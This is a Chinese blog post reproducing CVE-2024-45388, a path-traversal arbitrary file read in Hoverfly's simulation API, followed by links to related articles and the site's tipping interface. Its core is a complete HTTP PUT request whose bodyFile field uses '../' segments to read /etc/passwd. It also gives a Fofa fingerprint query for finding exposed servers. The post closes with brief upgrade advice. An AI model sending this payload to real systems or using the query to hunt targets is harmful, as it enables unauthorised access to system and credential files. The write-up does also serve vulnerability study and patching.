Hoverfly 任意文件读取漏洞 (CVE-2024-45388)

于 2024-09-09 13:50:43 发布
阅读量438 收藏
点赞数 10
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142057013
版权

0x01 漏洞描述:

Hoverfly是一个为开发人员和测试人员提供的轻量级服务虚拟化/API模拟/API模拟工具。在/api/v2/simulation接口存在任意文件读取漏洞,攻击者可以通过使用`../`段来逃离基本路径,从而访问任何任意文件

0x02 影响版本:

Hoverfly < 1.10.3

0x03 搜索语句:

Fofa:icon_hash="1357234275"

0x04 漏洞复现:

PUT /api/v2/simulation HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}

0x05 修复建议:

目前官方已发布漏洞修复版本,建议用户升级到安全版本:

https://hoverfly.io/

iSee857
关注
专栏目录
Hoverfly api/v2/simulation 任意文件读取漏洞复现(CVE-2024-45388)
0xSec
09-09 396
Hoverfly api/v2/simulation 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Python库 | pytest_hoverfly-4.0.0-py3-none-any.whl
03-23
python库,解压后可用。 资源全名:pytest_hoverfly-4.0.0-py3-none-any.whl
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 930
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
101web漏洞挖掘之任意文件读取漏洞1
08-03
1. 读取程序源代码(如密码配置文件) 2. 读取程序配置文件(如数据库连接文件) 5. 读取中间件配置文件weblogic/tomcat等密码文件,apac
任意文件读取漏洞
m0_57276420的博客
04-08 5854
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8890
文件读取漏洞文件下载漏洞文件包含漏洞三者结合,靶场练习
hoverfly-java:Hoverfly的Java绑定
02-03
`hoverfly-java`为Java应用程序提供了方便的接口,使开发者能够轻松地启动、配置和控制Hoverfly代理。通过这个库,你可以: 1. **启动和停止Hoverfly代理**:在代码中动态控制Hoverfly进程的生命周期。 2. **导入和...
Go-Hoverfly是一个用于开发和测试的API模拟工具
08-13
通过SpectoLabs-hoverfly-d0be140这个文件,你可以获取到Hoverfly的源码,进一步理解其工作原理,并参与到开源项目的贡献中去。 总之,Go-Hoverfly作为一个强大的API模拟工具,为开发和测试环节带来了灵活性和可控...
pytest-hoverfly
03-04
调用pytest时传递--hoverfly-simulation-path选项。 该路径可以是绝对路径,也可以是相对于pytest.ini文件的路径。 例如,如果您具有这样的结构: ├── myproject ├── ... ├── pytest.ini └── tests ...
任意文件读取漏洞复现
来日可期的博客
08-31 4308
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取漏洞知识梳理
qq_40909772的博客
11-17 1万+
文章目录1.概述2.开发语言触发点2.1 PHP2.2 Python2.3 Java2.4 Ruby2.5 Node3.中间件/服务器相关触发点3.1 Nginx错误配置3.2 数据库3.3 软链接3.4 FFmpeg3.5 Docker-API4.文件读取的目标目录5.题目复现5.1 afr_15.2 afr_25.3 afr_3 1.概述   文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。主要读取文件是服务器的各种配置文件文件形式存储的密钥、服务器信息(包括正在执行的进
Web的基本漏洞--任意文件读取与下载漏洞
尽欢
06-05 2552
任意文件读取漏洞介绍、任意文件下载漏洞介绍、常见的敏感文件
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 1863
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
[渗透测试] 任意文件读取漏洞
最新发布
Da1NtY的博客
06-25 1074
使用filepath传递,在filepath中输入地址来获取文件内容。​ php.ini配置文件中,限定文件访问范围。不能有文件包含漏洞,目录遍历漏洞或者其他漏洞。使用str_replace进行替换。让用户只能访问一定的路径。
任意文件读取/下载漏洞
qq_68163788的博客
05-23 3169
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
任意文件读取漏洞复现
weixin_58954236的博客
09-02 5158
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值